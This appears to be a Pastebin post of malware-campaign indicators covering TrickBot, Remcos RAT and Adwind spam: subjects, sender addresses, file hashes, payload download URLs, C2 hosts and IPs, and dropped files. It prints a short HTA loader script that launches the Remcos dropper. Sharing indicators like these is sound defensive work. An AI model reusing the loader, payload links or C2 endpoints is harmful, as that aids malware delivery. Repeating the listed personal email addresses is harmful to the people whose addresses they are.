Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- TRICKBOT
- ========
- SUBJECTS OBSERVED
- Case 89310
- Case 18621
- Case 92644
- Document 42048
- Info 50741
- Information Co-VID 2019 US-21779
- Information Co-VID 2019 US-25575
- Information Co-VID 2019 US-26131
- Information Co-VID 2019 US-29315
- Inportant Certificate 70904
- Inportant Certificate 76315
- Inportant Certificate 85845
- Notice 62959
- Notice 75037
- Notice 12183
- Notice 24902
- Notice 89864
- Price list 20655
- Price list 21571
- Pricelist 67723
- SENDERS OBSERVED
- agnes-bo@orange.fr
- bernavaesken@orange.fr
- bourqui_aurelia@orange.fr
- fahrikalkan@yahoo.com
- fred.courbis@orange.fr
- halsmith56@sbcglobal.net
- harper.ryan@sbcglobal.net
- hugoserru@orange.fr
- jasondatdude@sbcglobal.net
- kikel@bellsouth.net
- ksmith1941@att.net
- laineygee@sbcglobal.net
- sbrillaud@orange.fr
- stephaneguitet@orange.fr
- tylerpayne97@att.net
- XLS FILE HASHES
- 396342d0f56c2bd48090928533b84811
- 4b27434ebfecbe10791cbff4a3f9d5ae
- 5992a0512b07dc649966593c5fa83615
- 7e3d6b2e5c80a362a26c5c6b2f7be699
- TRICKBOT PAYLOAD
- https://dichthuatsnu.com/goodweb/pwofiles.php
- (404 for me)
- REMCOS RAT
- ==========
- SUBJECTS OBSERVED
- UPS - Pending delivery
- SENDERS OBSERVED
- customer@ups.com
- ISO FILE HASH
- UPS FILE.iso
- 234dad41dcc5a322f52389d9240f8a17
- EXE FILE HASH
- ReadMe.exe
- dda0e966b7ac2212f5198148f38671e8
- PAYLOAD URL
- https://drive.google.com/u/0/uc?id=1lVL8gvfw2wnlmPUClhC25NoOYP9k-g43&export=download
- https://doc-0s-5k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ra0dot23h8r8t95f4j3399di0c634nqe/1588353900000/01481671314862437446/*/1lVL8gvfw2wnlmPUClhC25NoOYP9k-g43?e=download
- FOLLOW-UP DOWNLOAD
- Cqsl
- 42274f35bf8af5c7e1375637cc645067
- ADDITIONAL DOWNLOADS
- Cqslset.exe
- dda0e966b7ac2212f5198148f38671e8
- Cqsl.hta
- 578bf01e06d2f3c533b704ea98c02591
- HTA FILE CONTENTS
- <script>
- var shell = new ActiveXObject("Shell.Application");
- shell.ShellExecute("C:\\Users\\analyst\\AppData\\Local\\Cqsl\\Cqslset.exe","","","open","0");
- window.close();
- </script>
- ADDITONAL FILES DROPPED/DOWNLOADED
- I also found the following two files that were created and added to C\Windows\system32
- fodhelper.exe
- 7215c73ec1aae35b9e4b1f22c811f85c
- propsys.dll
- 487766bf2f0add388cb123d1ef7ece46
- REMCOS C2
- u864246.nvpn.so:2404
- C:\Program Files (x86)\Internet Explorer\ieinstal.exe Connects to "185.140.53.21" on port 2404 (TCP).
- ADDITIONAL FILES
- The following files were created:
- C:\Windows\System32\fodhelper.exe
- C:\Windows\System32\propsys.dll
- C:\Users\analyst\AppData\Local\Cqsl\Cqsl.hta
- C:\Users\analyst\AppData\Local\Cqsl\Cqslset.exe
- C:\Users\analyst\AppData\Local\Cqsl\Fuck
- ADWIND
- ======
- SUBJECTS OBSERVED
- Congratulations!!! You have been awarded $500 Amazon gift card
- SENDERS OBSERVED
- noreply@amazon.com
- FILE ATTACHMENT HASHES
- Amazon Gift card.zip
- 6dda0276b4afd1e6be26a7690a8add2f
- Amazon Gift card.jar
- 1f88741dbf450bde1deafb256b6a1495
- ADWIND C2
- Queried DNS: praisesalways.ddns.net
- No reply
- Also saw TCP traffic to:
- 79.134.225.111:1010
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement